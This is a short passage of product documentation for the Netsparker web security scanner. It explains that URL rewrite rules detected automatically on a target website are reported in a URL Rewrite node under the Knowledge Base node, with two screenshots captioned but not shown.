Reporting the Detected URL Rewrites on Target Website

Once Netsparker Desktop or Netsparker Cloud automatically detect and configure URL rewrite rules for a target website, they report them in a new URL Rewrite node under the Knowledge Base node, as seen in the screenshots below.

Screenshot: Automatically configured URL rewrite rules are reported in the Knowledge Base node in Netsparker Desktop

Screenshot: Automatically configured URL rewrite rules are reported in the Knowledge Base node in Netsparker Cloud
